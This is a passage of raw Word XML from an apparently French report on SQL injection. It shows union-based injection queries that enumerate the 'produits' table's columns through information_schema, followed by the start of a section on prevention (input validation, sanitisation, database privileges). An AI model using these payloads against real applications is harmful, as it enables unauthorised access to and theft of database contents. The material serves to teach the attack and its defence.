      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00226607">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00226607">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id_pro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00226607">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> =11 union select 1,2,3,4,info from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00226607">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema.processlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A04D94" w:rsidRPr="00312435" w:rsidRDefault="00A04D94" w:rsidP="00523CBF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>Une des tables de la base de données est affichée</w:t>
      </w:r>
      <w:r w:rsidR="00523CBF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qui est</w:t>
      </w:r>
      <w:r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>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00523CBF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 xml:space="preserve"> produits</w:t>
      </w:r>
      <w:r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, on </w:t>
      </w:r>
      <w:r w:rsidR="00523CBF"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>essaye</w:t>
      </w:r>
      <w:r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donc d’extraire le nom des colonnes de cette table. </w:t>
      </w:r>
      <w:r w:rsidRPr="00312435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Pour cela on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312435">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312435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la </w:t>
      </w:r>
      <w:r w:rsidR="00523CBF" w:rsidRPr="00312435">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>requête</w:t>
      </w:r>
      <w:r w:rsidRPr="00312435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suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF0153" w:rsidRPr="00DE6CEB" w:rsidRDefault="00A04D94" w:rsidP="00523CBF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left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">union select 1,2,3,4,column_name FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>produits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04D94" w:rsidRPr="00CE1C5D" w:rsidRDefault="00523CBF" w:rsidP="00CE1C5D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>Les</w:t>
      </w:r>
      <w:r w:rsidR="00A04D94"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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nom de colonnes est affiché</w:t>
      </w:r>
      <w:r w:rsidR="00A04D94"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dans la figure suivante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB681C" w:rsidRDefault="00FB681C" w:rsidP="00FB681C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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760085" cy="3240405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40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F18E9" w:rsidRDefault="008F18E9" w:rsidP="00FB681C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="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B643D2" w:rsidRPr="00A629DF" w:rsidRDefault="00B643D2" w:rsidP="00287EAF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center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r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Figure 5.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1C5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</w:t>
      </w:r>
      <w:r w:rsidR="00287EAF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Nom de colonnes de la table ‘produit’ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB681C" w:rsidRPr="001B361D" w:rsidRDefault="00164BBC" w:rsidP="003D23EE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12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1B361D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Remarque</w:t>
      </w:r>
      <w:r w:rsidRPr="001B361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 : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00164BBC" w:rsidRDefault="00FE08F2" w:rsidP="003D23EE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12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  <w:r w:rsidRPr="001B361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A travers les exemples illustrés dans cette partie et les bases d’injection SQL présentées dans la partie 1, </w:t>
      </w:r>
      <w:r w:rsidR="00313596" w:rsidRPr="001B361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un intrus peut compromettre </w:t>
      </w:r>
      <w:r w:rsidR="009029B9" w:rsidRPr="001B361D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>l’applicatio</w:t>
      </w:r>
      <w:r w:rsidR="00E32BB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>n W</w:t>
      </w:r>
      <w:r w:rsidR="009029B9" w:rsidRPr="001B361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eb en supprimant des données des tables ou plus que ça en s’accordant des </w:t>
      </w:r>
      <w:r w:rsidR="001B361D" w:rsidRPr="001B361D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>privilèges</w:t>
      </w:r>
      <w:r w:rsidR="009029B9" w:rsidRPr="001B361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d’administrateur et réaliser des taches hostiles.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00660181" w:rsidRDefault="00660181" w:rsidP="00660181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</w:p>
    <w:p w:rsidR="00660181" w:rsidRDefault="00660181" w:rsidP="00660181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</w:p>
    <w:p w:rsidR="00660181" w:rsidRDefault="00660181" w:rsidP="00660181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</w:p>
    <w:p w:rsidR="00660181" w:rsidRDefault="00660181" w:rsidP="00660181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</w:p>
    <w:p w:rsidR="00660181" w:rsidRDefault="00660181" w:rsidP="00660181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</w:p>
    <w:p w:rsidR="00660181" w:rsidRDefault="00660181" w:rsidP="00660181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ind w:firstLine="284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</w:p>
    <w:p w:rsidR="00660181" w:rsidRDefault="00660181" w:rsidP="003E3BEB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0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="003D23EE" w:rsidRDefault="00DA5F45" w:rsidP="003D7008">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="10992"/>
          <w:tab w:val="left" w:pos="11340"/>
          <w:tab w:val="left" w:pos="11482"/>
          <w:tab w:val="left" w:pos="11766"/>
          <w:tab w:val="left" w:pos="11907"/>
          <w:tab w:val="left" w:pos="12049"/>
          <w:tab w:val="left" w:pos="12474"/>
          <w:tab w:val="left" w:pos="12824"/>
          <w:tab w:val="left" w:pos="13467"/>
          <w:tab w:val="left" w:pos="13740"/>
          <w:tab w:val="left" w:pos="14034"/>
          <w:tab w:val="left" w:pos="14656"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r w:rsidRPr="003D23EE"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  <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Partie 3: </w:t>
      </w:r>
      <w:r w:rsidR="00660181" w:rsidRPr="003D23EE"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  <w:t>Prévention</w:t>
      </w:r>
      <w:r w:rsidRPr="003D23EE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> des attaques d’injection SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DD5F83" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Les attaques d'injection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SQL se produisent </w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>généralement en raison de l'utilisation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non filtré</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>e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r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">des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>entré</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>es utilisateurs</w:t>
      </w:r>
      <w:r w:rsidR="005E3BF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou de</w:t>
      </w:r>
      <w:r w:rsidR="00C656F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> certains </w:t>
      </w:r>
      <w:r w:rsidR="005E3BF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>privilèges</w:t>
      </w:r>
      <w:r w:rsidR="00C656F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> trop </w:t>
      </w:r>
      <w:r w:rsidR="00CA0FB3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lâche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de </w:t>
      </w:r>
      <w:r w:rsidR="00C656F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">la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>base de données. Certaine</w:t>
      </w:r>
      <w:r w:rsidR="00CA0FB3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">s des erreurs communes qui rendent notre application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>susceptible des attaques d'injection de SQL sont</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567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>•</w:t>
      </w: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ab/>
      </w:r>
      <w:r w:rsidR="00C01678">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La validation faible des entrées des utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567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>•</w:t>
      </w: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ab/>
      </w:r>
      <w:r w:rsidR="00C01678">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La c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onstruction dynamique des commandes SQL sans </w:t>
      </w:r>
      <w:r w:rsidR="00776AA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>assainissement</w:t>
      </w:r>
      <w:r w:rsidR="000A6913">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> des</w:t>
      </w:r>
      <w:r w:rsidR="00C01678">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> paramètres.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567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>•</w:t>
      </w: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ab/>
      </w:r>
      <w:r w:rsidR="000A6BD6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Utilisation des privilèg</w:t>
      </w:r>
      <w:r w:rsidR="000A6BD6" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>es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r w:rsidR="000A6BD6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trop lâche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de </w:t>
      </w:r>
      <w:r w:rsidR="000A6BD6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">la 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>base de données</w:t>
      </w:r>
      <w:r w:rsidR="000A6BD6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="009668B0" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Les attaques d'injection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SQL peuvent être facilement </w:t>
      </w:r>
      <w:r w:rsidR="00154F69">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>évitées</w:t>
      </w:r>
      <w:r w:rsidR="003C4BAD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> en apportant d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es </w:t>
      </w:r>
      <w:r w:rsidR="00A13258">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">simples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>modifications</w:t>
      </w:r>
      <w:r w:rsidR="00A13258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au programme, cependant, </w:t>
      </w:r>
      <w:r w:rsidR="00F8552E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">les </w:t>
      </w:r>
      <w:r w:rsidR="00D61F96">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>développeurs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doivent être </w:t>
      </w:r>
      <w:r w:rsidR="00F8552E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">assez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>disciplinés</w:t>
      </w:r>
      <w:r w:rsidR="00F8552E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pour </w:t>
      </w:r>
      <w:r w:rsidR="00F8552E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">appliquer les modifications appropriées à chaque </w:t>
      </w:r>
      <w:r w:rsidR="00D61F96">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>procédure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et fonction</w:t>
      </w:r>
      <w:r w:rsidR="00F8552E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>s accessibles dans l’application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Web. </w:t>
      </w:r>
      <w:r w:rsidR="004B7550" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chaque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commande SQL dynamique doit être protégée. Une </w:t>
      </w:r>
      <w:r w:rsidR="004B7550">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">seule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commande SQL non protégée peut </w:t>
      </w:r>
      <w:r w:rsidR="00B35438">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>influée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r w:rsidR="00B35438">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sur le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serveur </w:t>
      </w:r>
      <w:r w:rsidR="00B35438">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Web et les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données </w:t>
      </w:r>
      <w:r w:rsidR="00B35438">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>contenues dans la base</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00EC7E65" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
